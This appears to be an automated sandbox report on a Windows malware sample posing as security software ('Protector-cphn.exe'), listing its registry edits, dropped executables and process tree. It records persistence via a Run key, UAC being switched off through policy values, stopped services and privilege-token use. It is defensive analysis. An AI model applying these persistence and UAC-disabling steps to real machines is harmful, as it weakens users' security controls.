Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-cphn.exe" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Indicator Removal: File Deletion
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\services.msc | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\eventvwr.msc | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\diskmgmt.msc | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E9BEAA60-9745-11EF-BDBF-4A034D48373C} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 702820bf522bdb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31140690" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31140690" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3192493666" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437116175" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80fc18bf522bdb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000013dbeb74f69550459d232b3693c378ca000000000200000000001066000000010000200000001e2c830cc4003afc945a40fb9bea89897772c71535671078aa07f0b2c2854008000000000e80000000020000200000002cd119bfa40e4dec180355990b8297d2084f7dac45f6b2e2e42cd83d47895b7a20000000c2cfe00fd66053b9f423c70ee1a9c476dd36f85ec5dd1a9c568152ec1de028cd400000006a0e32a146a8e1a5b442e3722966ff1649297b1fa6bae68609cea8e78a85369832886e808037a67648feca1845e03f61bfb902af5f3d8660eaa5ccaee77a10a9 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3191243263" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3192493666" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31140690" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3191243263" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31140690" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000013dbeb74f69550459d232b3693c378ca0000000002000000000010660000000100002000000063a7059ba8c2a8311f0cab0aac09ce30f96088761523aed9368f5a7f7443d73c000000000e8000000002000020000000ac6863a2b68c1ef6b99d1cabe9b3c679c2fa210b60db568f9ce0e3d8d63699ba2000000071b187c2eff2d97bed4d252cb9d3daf6321c586b9d065e5ed63fefe1fdcb24344000000025f068a37d012ca30dc999034a67d7959eee431c4c809d5505814f19524e20207d1d4a768e3c4acbc4fb117b3c4aa3ea43b1e5365741d060c915cc4ae8e42403 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\VersionIndependentProgID\ = "WbemScripting.SWbemNamedValueSet" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\ = "Viviki.Adajo" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\ProgID\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Programmable\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win32\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\InProcServer32 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\ProgID | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\FLAGS\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Programmable | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\FLAGS\ = "0" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\VersionIndependentProgID\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\InProcServer32\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win64 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Version | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55} | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\InProcServer32\ = "%SystemRoot%\\SysWow64\\wbem\\wbemdisp.dll" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\ = "MTS 2.0 Admin Type Library" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\TypeLib\ = "{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\FLAGS | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win32 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win64\ = "C:\\Windows\\SysWow64\\Com\\mtsadmin.tlb" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\ProgID\ = "WbemScripting.SWbemNamedValueSet.1" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0 | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win64\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\VersionIndependentProgID | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Version\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Version\ = "1.0" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA} | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win32\ = "C:\\Windows\\SysWOW64\\Com\\mtsadmin.tlb" | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\TypeLib | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\TypeLib\ | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | C:\Users\Admin\AppData\Roaming\Protector-cphn.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe" -e -p7k3y195xurds9tc
C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe"
C:\Users\Admin\AppData\Roaming\Protector-cphn.exe
C:\Users\Admin\AppData\Roaming\Protector-cphn.exe
C:\Windows\SysWOW64\cmd.exe
